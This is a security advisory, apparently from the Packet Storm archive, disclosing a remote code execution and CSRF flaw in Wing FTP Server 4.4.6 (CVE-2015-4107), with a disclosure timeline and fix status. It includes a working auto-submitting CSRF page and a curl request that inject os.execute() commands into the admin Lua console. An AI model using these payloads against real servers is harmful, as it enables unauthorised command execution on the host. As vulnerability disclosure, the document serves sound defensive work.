what you don't know can hurt you

Wing FTP 4.4.6 Code Execution / Cross Site Request Forgery

Wing FTP 4.4.6 Code Execution / Cross Site Request Forgery
Posted Jun 5, 2015
Authored by Alex Haynes

Wing FTP server version 4.4.6 suffers from remote code execution and cross site request forgery vulnerabilities.

tags | exploit, remote, vulnerability, code execution, csrf
advisories | CVE-2015-4107
MD5 | 44dec89b40a8814f3d57e5d6f6605547

Wing FTP 4.4.6 Code Execution / Cross Site Request Forgery

Change Mirror Download
Exploit Title: Wing FTP Server Remote Code Execution vulnerability
Product: Wing FTP Server
Vulnerable Versions: 4.4.6 and all previous versions
Tested Version: 4.4.6
Advisory Publication: 05/06/2015
Latest Update: 05/06/2015
Vulnerability Type: Improper Control of Generation of Code [CWE-94]
CVE Reference: CVE-2015-4107
Credit: Alex Haynes

Advisory Details:


(1) Vendor & Product Description
--------------------------------
Vendor:Wing FTP software


Product & Version:
Wing FTP Server v 4.4.6

Vendor URL & Download:
http://www.wftpserver.com/

Product Description:
"Wing FTP Server is an easy-to-use, secure and feature-rich enterprise FTP Server that can be used in Windows, Linux, Mac OSX and Solaris. It supports a number of file transfer protocols, including FTP, HTTP, FTPS, HTTPS and SFTP server, giving your end-users flexibility in how they connect to the server. And it provides admins with a web based interface to administrate the server from anywhere. You can also monitor server performance and online sessions and even receive email notifications about various events taking place on the server."


(2) Vulnerability Details:
--------------------------
The admin interface of Wing FTP Server is vulnerable to a Remote Code Execution (RCE) vulnerability.

Proof of concept for RCE [CVE-2015-4107]:
-----------------------------------------

The RCE can be exploited in two scenarios, either by a CSRF attack (the admin interface is vulnerable to CSRF attacks) or by being authenticated to the admin interface. The attack leverages the LUA CLI to inject commands at the same privilege as the web server.

The RCE via CSRF POC

<html>
<body>
<form action="http://<server address>:5466/admin_lua_script.html" method="POST" enctype="text/plain">
<input type="hidden" name="command" value="os.execute('<any OS command here>')" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

RCE via authenticated administrator

1) Either utilising the LUA Console interface directly and using the os.execute('<OS command here>') method.
2) POST directly using CURL with an authenticated cookie:
curl -i -s -k -X 'POST' -b 'admin_lang=english; UIDADMIN=b8b208e2239f462c11641eaa10cde7b0' --data-binary $'command=os.execute(\'cmd.exe\')'
'http://<server address>:5466/admin_lua_script.html'

Parameter names: "command"
Parameter Type: POST
Attack Pattern:
Any OS command can be inserted into the os.execute('') method.


(3) Advisory Timeline:
----------------------
27/05/2015 - First Contact
27/05/2015 - Vendor responds with requests for details of vulnerabilities.
28/05/2015 - Vulnerability details sent with POC.
28/05/2015 - Vendor requests clarification on impact and various attack scenarios.
28/05/2015 - Vulnerability scenarios defined.
29/05/2015 - Vulnerability confirmed and new version 4.4.7 released. Requests a week delay before public disclosure.
05/06/2015 - Public disclosure

(4)Solution:
------------
CSRF attack vector fixed in version 4.4.7. No fix for authenticated RCE at this time.


(5) Credits:
------------
Discovered by Alex Haynes

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4107
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4107
Login or Register to add favorites

File Archive:

October 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    25 Files
  • 2
    Oct 2nd
    13 Files
  • 3
    Oct 3rd
    1 Files
  • 4
    Oct 4th
    1 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    15 Files
  • 7
    Oct 7th
    15 Files
  • 8
    Oct 8th
    11 Files
  • 9
    Oct 9th
    3 Files
  • 10
    Oct 10th
    1 Files
  • 11
    Oct 11th
    1 Files
  • 12
    Oct 12th
    8 Files
  • 13
    Oct 13th
    12 Files
  • 14
    Oct 14th
    23 Files
  • 15
    Oct 15th
    4 Files
  • 16
    Oct 16th
    13 Files
  • 17
    Oct 17th
    1 Files
  • 18
    Oct 18th
    1 Files
  • 19
    Oct 19th
    27 Files
  • 20
    Oct 20th
    41 Files
  • 21
    Oct 21st
    18 Files
  • 22
    Oct 22nd
    16 Files
  • 23
    Oct 23rd
    2 Files
  • 24
    Oct 24th
    1 Files
  • 25
    Oct 25th
    1 Files
  • 26
    Oct 26th
    17 Files
  • 27
    Oct 27th
    19 Files
  • 28
    Oct 28th
    29 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close